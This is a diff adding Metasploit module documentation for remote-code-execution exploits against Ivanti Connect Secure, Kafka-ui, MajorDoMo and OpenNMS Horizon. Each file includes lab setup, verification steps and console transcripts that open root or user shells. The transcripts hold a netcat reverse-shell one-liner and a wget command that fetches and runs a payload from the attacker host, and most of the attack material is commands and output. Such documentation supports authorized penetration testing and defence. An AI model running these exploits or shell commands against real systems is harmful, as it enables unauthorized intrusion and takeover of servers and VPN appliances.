+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > set PAYLOAD cmd/unix/reverse_bash
+PAYLOAD => cmd/unix/reverse_bash
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > show options
+
+Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.86.111   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    443              yes       The target port (TCP)
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.86.42    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Unix Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > check
+[+] 192.168.86.111:443 - The target is vulnerable. IVE-OS 22.3R1 (1647)
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. IVE-OS 22.3R1 (1647)
+[*] Command shell session 2 opened (192.168.86.42:4444 -> 192.168.86.111:27582) at 2024-01-17 10:19:19 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux localhost2 4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
+pwd
+/data/var/cores
+cat /home/ssl-vpn-VERSION
+export DSREL_MAJOR=22
+export DSREL_MINOR=3
+export DSREL_MAINT=1
+export DSREL_DATAVER=4802
+export DSREL_PRODUCT=ssl-vpn
+export DSREL_DEPS=ive
+export DSREL_BUILDNUM=1647
+export DSREL_COMMENT="R1"
+exit
+[*] 192.168.86.111 - Command shell session 2 closed.
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) >
+```
@@ -0,0 +1,189 @@
+## Vulnerable Application
+This module chains a server side request forgery (SSRF) vulnerability (CVE-2024-21893) and a command injection
+vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti
+Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and
+22.x are vulnerable, prior to the vendor patch released on Feb 1, 2024. It is unknown if unsupported versions
+8.x and below are also vulnerable.
+
+## Testing
+To test we used Ivanti Connect Secure version 22.3R1 (build 1647), deployed as a virtual appliance for HyperV. The
+below steps are for HyperV, but it should be very similar to install on VMWare.
+
+* Signup for a trial to download the file `ps-ics-hyper-v-isa-v-22.3r1.0-b1647-package.zip`
+* From this ZIP file, extract the file `ISA-V-HYPERV-ICS-22.3R1-1647.1-VT-hyperv.vhdx`
+* Create a new VM in HyperV and specify the VHDX file as the hard drives media.
+* Boot the VM and follow the console instructions to install the product.
+* After installation completes, you will have created an admin account and password. You can log into the admin
+  web interface by visiting https://<TARGET_IP_ADDRESS>/admin in your web browser if you want.
+
+## Verification Steps
+1. Start msfconsole
+2. `use exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
+5. `check`
+6. `exploit`
+
+## Scenarios
+To support a broad set of available payloads, we support both the Linux and Unix platforms. This allows for native
+Linux payloads to be used, but also payloads like Python meterpreter or a Bash shell.
+
+### Automatic (Linux Payload)
+
+```
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set RHOST 192.168.86.111
+RHOST => 192.168.86.111
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
+PAYLOAD => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > show options
+
+Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[
+                                       ,type:host:port][...]
+   RHOSTS   192.168.86.111   yes       The target host(s), see https://docs.me
+                                       tasploit.com/docs/using-metasploit/basi
+                                       cs/using-metasploit.html
+   RPORT    443              yes       The target port (TCP)
+   SSL      true             no        Negotiate SSL/TLS for outgoing connecti
+                                       ons
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   FETCH_COMMAND      CURL             yes       Command to fetch payload (Acc
+                                                 epted: CURL, FTP, TFTP, TNFTP
+                                                 , WGET)
+   FETCH_DELETE       false            yes       Attempt to delete the binary
+                                                 after execution
+   FETCH_FILENAME     XMZdmHhNxYx      no        Name to use on remote system
+                                                 when storing payload; cannot
+                                                 contain spaces.
+   FETCH_SRVHOST                       no        Local IP to use for serving p
+                                                 ayload
+   FETCH_SRVPORT      8080             yes       Local port to use for serving
+                                                  payload
+   FETCH_URIPATH                       no        Local URI to use for serving
+                                                 payload
+   FETCH_WRITABLE_DI  /tmp             yes       Remote writable dir to store
+   R                                             payload; cannot contain space
+                                                 s.
+   LHOST              eth0             yes       The listen address (an interf
+                                                 ace may be specified)
+   LPORT              4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > check
+[*] 192.168.86.111:443 - The service is running, but could not be validated.
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[*] Sending stage (3045380 bytes) to 192.168.86.111
+[*] Meterpreter session 3 opened (192.168.86.42:4444 -> 192.168.86.111:45734) at 2024-02-09 09:21:59 +0000
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.86.111
+OS           :  (Linux 4.15.18.34-production)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > cat /home/ssl-vpn-VERSION
+export DSREL_MAJOR=22
+export DSREL_MINOR=3
+export DSREL_MAINT=1
+export DSREL_DATAVER=4802
+export DSREL_PRODUCT=ssl-vpn
+export DSREL_DEPS=ive
+export DSREL_BUILDNUM=1647
+export DSREL_COMMENT="R1"
+meterpreter > exit
+[*] Shutting down session: 3
+
+[*] 192.168.86.111 - Meterpreter session 3 closed.  Reason: Died
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > 
+```
+
+### Automatic (Unix Payload)
+
+```
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set PAYLOAD cmd/unix/reverse_bash
+PAYLOAD => cmd/unix/reverse_bash
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > show options
+
+Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[
+                                       ,type:host:port][...]
+   RHOSTS   192.168.86.111   yes       The target host(s), see https://docs.me
+                                       tasploit.com/docs/using-metasploit/basi
+                                       cs/using-metasploit.html
+   RPORT    443              yes       The target port (TCP)
+   SSL      true             no        Negotiate SSL/TLS for outgoing connecti
+                                       ons
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  eth0             yes       The listen address (an interface may be s
+                                     pecified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > check
+[*] 192.168.86.111:443 - The service is running, but could not be validated.
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[*] Command shell session 4 opened (192.168.86.42:4444 -> 192.168.86.111:45736) at 2024-02-09 09:23:15 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+cat /home/ssl-vpn-VERSION
+export DSREL_MAJOR=22
+export DSREL_MINOR=3
+export DSREL_MAINT=1
+export DSREL_DATAVER=4802
+export DSREL_PRODUCT=ssl-vpn
+export DSREL_DEPS=ive
+export DSREL_BUILDNUM=1647
+export DSREL_COMMENT="R1"
+exit
+[*] 192.168.86.111 - Command shell session 4 closed.
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > 
+```
@@ -0,0 +1,224 @@
+## Vulnerable Application
+A command injection vulnerability exists in Kafka-ui between `v0.4.0` and `v0.7.1` allowing an attacker to inject
+and execute arbitrary shell commands via the `groovy` filter parameter at the `topic` section.
+
+This module has been tested with Kali Linux 2023.11 on the following targets:
+* Kafka-ui v0.4.0 running on MacOS Docker Desktop
+* Kafka-ui v0.7.0 running on MacOS Docker Desktop
+* Kafka-ui v0.7.1 running on MacOS Docker Desktop
+
+## Installation
+### Installation steps to install Kafka-ui
+* Install `Docker` on your preferred platform.
+*  Here are the installation instructions for [Docker Desktop on MacOS](https://docs.docker.com/desktop/install/mac-install/).
+* Create a empty directory (`kafka-ui`).
+* Create the following `docker-compose.yaml` file in the directory. This will automatically create a Kafka cluster with Kafka-ui.
+* You can modify the `v0.7.0` in the `yaml` file to pull different versions.
+```yaml
+version: '2'
+
+networks:
+  rmoff_kafka:
+    name: rmoff_kafka
+
+services:
+  zookeeper:
+    image: confluentinc/cp-zookeeper:latest
+    container_name: zookeeper
+    networks:
+      - rmoff_kafka
+    environment:
+      ZOOKEEPER_CLIENT_PORT: 2181
+      ZOOKEEPER_TICK_TIME: 2000
+    ports:
+      - 22181:2181
+
+  kafka:
+    image: confluentinc/cp-kafka:latest
+    container_name: kafka
+    networks:
+      - rmoff_kafka
+    depends_on:
+      - zookeeper
+    ports:
+      - 29092:9092
+    environment:
+      KAFKA_BROKER_ID: 1
+      KAFKA_ZOOKEEPER_CONNECT: zookeeper:2181
+      KAFKA_ADVERTISED_LISTENERS: PLAINTEXT://kafka:9092,PLAINTEXT_HOST://localhost:29092
+      KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: PLAINTEXT:PLAINTEXT,PLAINTEXT_HOST:PLAINTEXT
+      KAFKA_INTER_BROKER_LISTENER_NAME: PLAINTEXT
+      KAFKA_OFFSETS_TOPIC_REPLICATION_FACTOR: 1
+
+  kafka-ui:
+    container_name: kafka-ui
+    image: provectuslabs/kafka-ui:v0.7.0
+    networks:
+      - rmoff_kafka
+    ports:
+      - 8080:8080
+    depends_on:
+      - kafka
+      - zookeeper
+    environment:
+      KAFKA_CLUSTERS_0_NAME: local
+      KAFKA_CLUSTERS_0_BOOTSTRAPSERVERS: kafka:9092
+      KAFKA_CLUSTERS_0_ZOOKEEPER: zookeeper:2181
+      KAFKA_BROKERCONNECT: kafka:9092
+      DYNAMIC_CONFIG_ENABLED: 'true'
+      KAFKA_CLUSTERS_0_METRICS_PORT: 9997
+```
+
+* Run following command `docker-compose up -d` to install and run the Kafka ui and cluster environment.
+* Your Kafka ui should be accessible on `http://localhost:8080` with an active Kafka cluster running.
+* You can bring down the environment for a fresh start with the command `docker-compose down --volumes`.
+
+You are now ready to test the module.
+
+## Verification Steps
+- [x] Start `msfconsole`
+- [x] `use exploit/linux/http/kafka_ui_unauth_rce_cve_2023_52251`
+- [x] `set rhosts <ip-target>`
+- [x] `set lhost <ip-attacker>`
+- [x] `set target <0=Unix/Linux Command>`
+- [x] `exploit`
+
+you should get a `shell` or `Meterpreter`.
+
+```shell
+msf6 exploit(linux/http/kafka_ui_unauth_rce_cve_2023_52251) > info
+
+       Name: Kafka UI Unauthenticated Remote Command Execution via the Groovy Filter option.
+     Module: exploit/linux/http/kafka_ui_unauth_rce_cve_2023_52251
+   Platform: Unix, Linux
+       Arch: cmd, x64, x86
+ Privileged: Yes
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2023-09-27
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  BobTheShopLifter and Thingstad
+
+Module side effects:
+ ioc-in-logs
+ artifacts-on-disk
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   Unix/Linux Command
+
+Check supported:
+  Yes
+
+Basic options:
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+  RPORT    8080             yes       The target port (TCP)
+  SSL      false            no        Negotiate SSL/TLS for outgoing connections
+  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+  URIPATH                   no        The URI to use for this exploit (default is random)
+  VHOST                     no        HTTP server virtual host
+
+
+  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine
+                                      or 0.0.0.0 to listen on all addresses.
+  SRVPORT  8080             yes       The local port to listen on.
+
+Payload information:
+
+Description:
+  A command injection vulnerability exists in Kafka ui between `v0.4.0` and `v0.7.1` allowing
+  an attacker to inject and execute arbitrary shell commands via the `groovy` filter parameter
+  at the `topic` section.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2023-52251
+  https://attackerkb.com/topics/ATJ1hTVB8H/cve-2023-52251
+  https://github.com/BobTheShoplifter/CVE-2023-52251-POC
+
+
+View the full module info with the info -d command.
+```
+
+## Options
+No specific options for this module.
+
+## Scenarios
+### Kafka-ui v0.7.0 Unix/Linux Command - cmd/unix/reverse_netcat
+```shell
+msf6 exploit(linux/http/kafka_ui_unauth_rce_cve_2023_52251) > set verbose true
+verbose => true
+msf6 exploit(linux/http/kafka_ui_unauth_rce_cve_2023_52251) > exploit
+
+[+] mkfifo /tmp/cpzbj; nc 192.168.201.8 4444 0</tmp/cpzbj | /bin/sh >/tmp/cpzbj 2>&1; rm /tmp/cpzbj
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.25:8080 can be exploited.
+[+] The target is vulnerable. Kafka-ui version: 0.7.0
+[*] Executing Unix/Linux Command for cmd/unix/reverse_netcat
+[*] Searching for active Kafka cluster...
+[+] Active Kafka cluster found: local
+[*] Creating a new topic...
+[+] New topic created: 9nQbg
+[*] Trigger Groovy script payload execution by creating a message...
+[*] Removing tracks...
+[+] Successfully deleted topic 9nQbg.
+[*] Command shell session 28 opened (192.168.201.8:4444 -> 192.168.201.25:49429) at 2024-01-20 18:44:52 +0000
+
+uname -a
+Linux 889a0c5cec88 6.4.16-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Nov 16 10:55:59 UTC 2023 x86_64 Linux
+id
+uid=100(kafkaui) gid=101(kafkaui) groups=101(kafkaui)
+```
+### Kafka-ui v0.7.0 Unix/Linux Command - cmd/linux/http/x64/meterpreter_reverse_tcp
+```shell
+msf6 exploit(linux/http/kafka_ui_unauth_rce_cve_2023_52251) > exploit
+
+[*] Command to run on remote host: wget -qO /tmp/LfMsMsUxX http://192.168.201.8:1981/Qw3rZo-yo18aYrvy_AQU-w; chmod +x /tmp/LfMsMsUxX; /tmp/LfMsMsUxX &
+[*] Fetch Handler listening on 192.168.201.8:1981
+[*] HTTP server started
+[*] Adding resource /Qw3rZo-yo18aYrvy_AQU-w
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.25:8080 can be exploited.
+[+] The target appears to be vulnerable. Kafka-ui version: 0.7.0
+[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter_reverse_tcp
+[*] Searching for active Kafka cluster...
+[+] Active Kafka cluster found: local
+[*] Creating a new topic...
+[+] New topic created: D9kH687
+[*] Trigger Groovy script payload execution by creating a message...
+[*] Removing tracks...
+[*] Client 192.168.201.25 requested /Qw3rZo-yo18aYrvy_AQU-w
+[*] Sending payload to 192.168.201.25 (Wget)
+[+] Successfully deleted topic D9kH687.
+[*] Meterpreter session 29 opened (192.168.201.8:4444 -> 192.168.201.25:50355) at 2024-01-23 08:47:41 +0000
+
+meterpreter > sysinfo
+Computer     : 172.30.0.4
+OS           :  (Linux 6.4.16-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: kafkaui
+meterpreter >
+```
+
+## Limitations
+No limitations.
@@ -0,0 +1,129 @@
+## Vulnerable Application
+
+This module exploits a command injection vulnerability in MajorDoMo versions before 0662e5e. To set up a test environment:
+
+1. Download MajorDoMo by executing the following command:
+```
+curl -s https://raw.githubusercontent.com/sergejey/majordomo-rpi-install/main/install.sh | bash && bash ~/majordomo-rpi-install/install.sh
+```
+2. Follow the installation script instructions to install MajorDoMo on a Raspberry Pi or a Linux-based server.
+3. Ensure that the network interface is active and properly configured during installation.
+4. Replace `/var/www/html/modules/thumb/thumb.php` with
+https://raw.githubusercontent.com/sergejey/majordomo/1167ca408a911c98937000516588c12cc33a1ab7/modules/thumb/thumb.php.
+5. After installation, verify that the MajorDoMo service is operational and accessible over the network.
+
+
+## Verification Steps
+
+1. Install MajorDoMo with a version prior to 0662e5e.
+2. Start msfconsole in your Metasploit environment.
+3. Do: `use exploit/linux/http/majordomo_cmd_inject_cve_2023_50917`
+4. Set the RHOSTS to the target IP address or hostname.
+5. Do: `run`
+6. If the target is vulnerable, the exploit will execute the specified payload.
+
+## Options
+
+No options
+
+## Scenarios
+
+### Successful Exploitation against MajorDoMo
+
+This scenario demonstrates exploiting MajorDoMo on a Linux server.
+
+**Environment**:
+- MajorDoMo before 0662e5e
+- Linux Server or Raspberry Pi
+- Metasploit Framework
+
+**Expected Output**:
+
+```
+msf6 > search cve_2023_50917
+
+Matching Modules
+================
+
+   #  Name                                                    Disclosure Date  Rank       Check  Description
+   -  ----                                                    ---------------  ----       -----  -----------
+   0  exploit/linux/http/majordomo_cmd_inject_cve_2023_50917  2023-12-15       excellent  Yes    MajorDoMo Command Injection
+
+
+Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/majordomo_cmd_inject_cve_2023_50917
+
+msf6 > use 0
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/majordomo_cmd_inject_cve_2023_50917) > options 
+Module options (exploit/linux/http/majordomo_cmd_inject_cve_2023_50917):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format typ
+                                         e:host:port[,type:host:port
+                                         ][...]
+   RHOSTS                      yes       The target host(s), see htt
+                                         ps://docs.metasploit.com/do
+                                         cs/using-metasploit/basics/
+                                         using-metasploit.html
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgo
+                                         ing connections
+   TARGETURI  /                yes       The URI path to MajorDoMo
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FETCH_COMMAND   CURL             yes       Command to fetch paylo
+                                              ad (Accepted: CURL, FT
+                                              P, TFTP, TNFTP, WGET)
+   FETCH_DELETE    false            yes       Attempt to delete the
+                                              binary after execution
+   FETCH_FILENAME  GRigjGGzCVI      no        Name to use on remote
+                                              system when storing pa
+                                              yload; cannot contain
+                                              spaces.
+   FETCH_SRVHOST                    no        Local IP to use for se
+                                              rving payload
+   FETCH_SRVPORT   8080             yes       Local port to use for
+                                              serving payload
+   FETCH_URIPATH                    no        Local URI to use for s
+                                              erving payload
+   FETCH_WRITABLE                   yes       Remote writable dir to
+   _DIR                                        store payload; cannot
+                                               contain spaces.
+   LHOST           192.168.1.5      yes       The listen address (an
+                                               interface may be spec
+                                              ified)
+   LPORT           4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/majordomo_cmd_inject_cve_2023_50917) > set rhosts 192.168.1.18
+rhosts => 192.168.1.18
+msf6 exploit(linux/http/majordomo_cmd_inject_cve_2023_50917) > exploit 
+[*] Started reverse TCP handler on 192.168.1.5:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.1.18:80 can be exploited!
+[+] Target is identified as MajorDoMo instance
+[*] Performing command injection test issuing a sleep command of 9 seconds.
+[*] Elapsed time: 9.112166871999989 seconds.
+[+] The target is vulnerable. Successfully tested command injection.
+[*] Sending stage (3045380 bytes) to 192.168.1.18
+[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.18:60054) at 2023-12-21 23:56:54 +0100
+
+meterpreter > getuid 
+Server username: www-data
+```
@@ -0,0 +1,237 @@
+## Vulnerable Application
+This module exploits built-in functionality in OpenNMS Horizon in order to execute arbitrary commands as the opennms user.
+For versions 32.0.2 and higher, this module requires valid credentials for a user
+with ROLE_FILESYSTEM_EDITOR privileges and either ROLE_ADMIN or ROLE_REST.
+For versions 32.0.1 and lower, credentials are required for a user with ROLE_FILESYSTEM_EDITOR, ROLE_REST, and/or ROLE_ADMIN privileges.
+
+The module first tries to authenticate to the target in order to verify the credentials and obtain the OpenNMS version.
+Next, the module attempts to obtain the privileges for the current user via the `/rest/users` endpoint
+and if that fails, via `/rest/filesystem/contents?f=users.xml`.
+
+The module then uses the obtained OpenNMS version number and user privileges to see if exploitation is possible.
+
+If the user has `ROLE_FILESYSTEM_EDITOR` privileges and either `ROLE_REST` or `ROLE_ADMIN`,
+exploitation is attempted directly, regardless of the OpenNMS version.
+
+If the user has `ROLE_ADMIN` privileges, exploitation is attempted, regardless of the OpenNMS version.
+In this case, the module will first use the REST API to add `ROLE_FILESYSTEM_EDITOR` privileges for the user.
+
+If the target is OpenNMS version 32.0.1 or lower and the highest user privileges are `ROLE_FILESYSTEM_EDITOR` or `ROLE_REST`,
+the module will automatically escalate privileges via CVE-2023-40315 or CVE-2023-0872, respectively.
+
+Once the user has the required privileges, the module takes the following approach to try and exploit the target:
+- It uses `/rest/filesystem` to write a payload to a .bsh file on the target
+- It uses `/rest/filesystem` to create a "notificationCommand" to execute the payload
+- It uses `/rest/filesystem` to create a "destinationPath" to specify the "notificationCommand"
+- It uses `/rest/filesystem` to create a "notification" for whenever an invalid login is performed to the web app.
+This "notification" points to the "destinationPath".
+- It uses `/rest/events` to reload the OpenNMS configuration
+- It performs an invalid login to OpenNMS in order to trigger the "notification", which will trigger the payload.
+The triggering of the payload can take several seconds, which is why the `WfsDelay` option is set to 15 by default.
+
+
+This module has been successfully tested against OpenNMS version 31.0.7
+
+## Installation Information
+OpenNMS is open source software and is available on [GitHub](https://github.com/OpenNMS/opennms).
+Documentation, including installation information, is available [here](https://docs.opennms.com/horizon/31/index.html).
+
+The easiest way to install OpenNMS is via docker. This requires creating two docker-compose files,
+one for the PostgreSQL database and one for OpenNMS Horizon:
+
+The PostgreSQL docker-compose file should look something like this:
+```
+---
+version: '3'
+
+volumes:
+  data-postgres: {}
+
+services:
+  database:
+    image: postgres:15.5
+    container_name: database
+    environment:
+      TZ: 'America/New_York'
+      POSTGRES_USER: 'postgres'
+      POSTGRES_PASSWORD: 'postgres'
+    volumes:
+      - 'data-postgres:/var/lib/postgresql/data'
+    healthcheck:
+      test: [ "CMD-SHELL", "pg_isready -U postgres" ]
+      interval: 10s
+      timeout: 3s
+      retries: 3
+    ports:
+      - '5432:5432/tcp'
+```
+
+For OpenNMS Horizon 31.0.8, the OpenNMS Horizon docker-compose file should look something like this, but any other version can be specified:
+```
+---
+version: '3'
+
+volumes:
+  data-opennms: {}
+  data-config: {}
+
+services:
+  horizon:
+    image: opennms/horizon:31.0.8
+    container_name: horizon
+    environment:
+      TZ: 'America/New_York'
+      POSTGRES_HOST: '192.168.91.202'
+      POSTGRES_PORT: 5432
+      POSTGRES_USER: 'postgres'
+      POSTGRES_PASSWORD: 'postgres'
+      OPENNMS_DBNAME: 'opennms-core-db'
+      OPENNMS_DBUSER: 'opennms'
+      OPENNMS_DBPASS: 'my-opennms-db-password'
+    volumes:
+      - data-opennms:/opennms-data
+      - data-config:/opt/opennms/etc
+    command: ["-s"]
+    ports:
+      - '8980:8980/tcp'
+      - '8101:8101/tcp'
+    healthcheck:
+      test: [ 'CMD', 'curl', '-f', '-I', 'http://localhost:8980/opennms/login.jsp' ]
+      interval: 1m
+      timeout: 5s
+      retries: 3
+```
+The OpenNMS web app will then be available on port 8980. The default credentials are admin:admin.
+
+## Verification Steps
+1. Start `msfconsole`
+2. Do: `use exploit/linux/http/opennms_horizon_authenticated_rce`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set LHOST [IP]`
+5. Do: `set FETCH_SRVHOST [IP]`
+6. Do: `exploit`
+
+## Options
+### TARGETURI
+The base path to OpenNMS. The default value is `/`.
+
+### USERNAME
+Username to authenticate with. The default value is `admin`
+
+### PASSWORD
+Password to authenticate with. The default value is `admin`
+
+
+## Advanced Options
+### PRIVESC_SAVE_DELAY
+The time in seconds to wait for privesc changes to go into effect. This is used only when escalating privileges via CVE-2023-40315.
+The default value is `3`.
+
+## Targets
+```
+Id  Name
+--  ----
+0   Linux
+```
+
+## Scenarios
+### OpenNMS Horizon 31.0.7 - Exploitation via CVE-2023-0872
+```
+msf6 exploit(linux/http/opennms_horizon_authenticated_rce) > options
+
+Module options (exploit/linux/http/opennms_horizon_authenticated_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD   rest             yes       Password to authenticate with
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.91.196   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      8980             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /opennms/        yes       The base path to OpenNMS
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USERNAME   rest             yes       Username to authenticate with                                                                                                                                                              
+   VHOST                       no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  192.168.91.196   yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      fZn              no        Name to use on remote system when storing payload; cannot contain spaces.
+   FETCH_SRVHOST       192.168.91.196   no        Local IP to use for serving payload
+   FETCH_SRVPORT       8081             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               192.168.91.196   yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux
+
+
+msf6 exploit(linux/http/opennms_horizon_authenticated_rce) > run
+
+[*] Started reverse TCP handler on 192.168.91.196:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] The target is OpenNMS version 31.0.7 and is likely vulnerable to CVE-2023-40315 and CVE-2023-0872.
+[+] The target appears to be vulnerable. User rest has ROLE_REST privileges. Exploitation is likely possible via CVE-2023-0872.
+[+] Successfully escalated privileges by adding ROLE_FILESYSTEM_EDITOR
+[*] Successfully edited notificationCommands.xml
+[*] Successfully edited destinationPaths.xml
+[*] Successfully edited notifications.xml
+[+] Successfully uploaded the payload to rebxympptby.bsh
+[*] Triggering the notification to execute the payload
+[*] Received expected response while triggering the payload. Please be patient, it may take a few seconds for the payload to execute.
+[*] Sending stage (3045380 bytes) to 172.20.0.2
+[*] Meterpreter session 1 opened (192.168.91.196:4444 -> 172.20.0.2:56974) at 2023-12-13 17:30:55 +0200
+[*] Attempting cleanup...
+
+meterpreter > getuid
+Server username: opennms
+
+```
+
+### OpenNMS Horizon 31.0.7 - Exploitation via CVE-2023-40315
+```
+msf6 exploit(linux/http/opennms_horizon_authenticated_rce) > set username file
+username => file
+msf6 exploit(linux/http/opennms_horizon_authenticated_rce) > set password file
+password => file
+msf6 exploit(linux/http/opennms_horizon_authenticated_rce) > run
+
